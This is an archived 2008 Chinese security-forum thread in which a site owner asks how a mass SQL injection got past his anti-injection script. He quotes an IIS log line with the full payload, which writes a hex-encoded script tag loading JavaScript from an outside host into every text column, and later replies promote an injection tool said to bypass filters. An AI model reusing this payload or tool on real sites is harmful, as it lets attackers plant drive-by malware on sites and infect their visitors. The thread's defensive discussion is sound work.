邪恶八进制信息安全团队技术讨论组 国内为数不多的技术与管理并举的专业信息安全团队 - Discuz! Archiver" /> [讨论]最近流行的数据库挂马方式讨论?(页 1) - 技术讨论{ Technique Discussions } - 邪恶八进制信息安全团队技术讨论组 努力为祖国的信息安全撑起一片蓝天 - Archiver

邪恶八进制信息安全团队技术讨论组's Archiver

小猴哥 2008-5-27 00:47

[讨论]最近流行的数据库挂马方式讨论?

很多站被黑.挂了
0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3C2F7363726970743E3C212D2D
这么一句,大家可以google上搜索下,

还原</title>"><scrip</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!


我抓的IIS的日志
---------- EX080518.LOG
2008-05-18 00:02:13 W3SVC337328992 125.76.230.26 GET /co/mb/pdview.asp pdid=59294;dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3C2F7363726970743E3C212D2D%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- 80 - 211.99.31.176 Mozilla/4.0 200 0 1236

很奇怪,为什么加了防注脚本,对这些危险的字符都过滤了,而且自己也测试了无法成功, 这个是怎么插入的,?

[[i] 本帖最后由 风泽 于 2008-6-8 18:25 编辑 [/i]]

viva88 2008-6-2 20:24

我也想知道用什么办法解决,不过一般都是把注入点找出来,然后sql限制比较好

憶楓 2008-6-3 05:55

最近好象出了新的饿注入软件 可以突破防注入程序
管中窥豹 注入工具 [url]http://gzkb.goomoo.cn[/url]

你们可以去看看

viva88 2008-6-5 16:07

请问哪里有管中窥豹下载呢.呵呵.

风尘秀吉 2008-6-7 02:28

不知道那个管中窥豹有没后门和绑马
如果没有 实为大作

fhod 2008-6-7 18:40

[quote]原帖由 [i]憶楓[/i] 于 2008-6-3 05:55 发表 [url=http://forum.eviloctal.com/redirect.php?goto=findpost&pid=143767&ptid=33191][img]images/common/back.gif[/img][/url]
最近好象出了新的饿注入软件 可以突破防注入程序
管中窥豹 注入工具 [url]http://gzkb.goomoo.cn[/url]

你们可以去看看 [/quote]


在此我顺便在这里把【管中窥豹】的加密方式简单说一说:【管中窥豹】同时采取了网络验证和usb加密锁双重验证的方式。网络验证采用了多线程互相监守、多线程随即认证、动态数据包加密、反本地模拟服务器等多种技术;usb加密则把软件的重要功能放到usb加密锁中运行,没有加密锁则缺失这些功能;此外还加上数个猛壳、字符串加密、CRC校验、反脱壳等等,要破解,几乎是不可能的任务。

共享软件很容易被破解倒是真的。

我想破解版大概会在2050年上市吧。  

  
作者: 古木系统安全

牛人哇..这也太牛比了...没准哪天就让人破了处

攻击者 2008-6-8 12:44

是真的铁面人,还是火枪手?

378835322 2008-7-25 09:57

防注脚本有漏洞。

工具不错。

寂寞网虫 2008-7-26 11:46

大作,可惜忘记了网络的根本目的
可惜,可惜。

hkboy 2008-7-26 13:14

以前也遇到过 同样用了防注入脚本 但还是被黑 幸好做了备份

ghostadmins 2008-7-26 22:22

防注基本没用。
数据库挂马真爽,管理员很难找。
可以用字符特征过滤。



qq:39575707
msn:ghostadmins@hotmail.com
email:xoops@163.com

lsaiyy7521 2008-7-29 15:10

我有那个管中.不过不大会用。

dashuzhi 2008-8-4 20:50

楼上的兄弟能发一份吗?多谢了!

[email]coongab@yahoo.com.cn[/email]

271015144 2008-8-7 01:09

真的假的啊怎么强大??????????

页: [1]
© 1999-2008 EvilOctal Security Team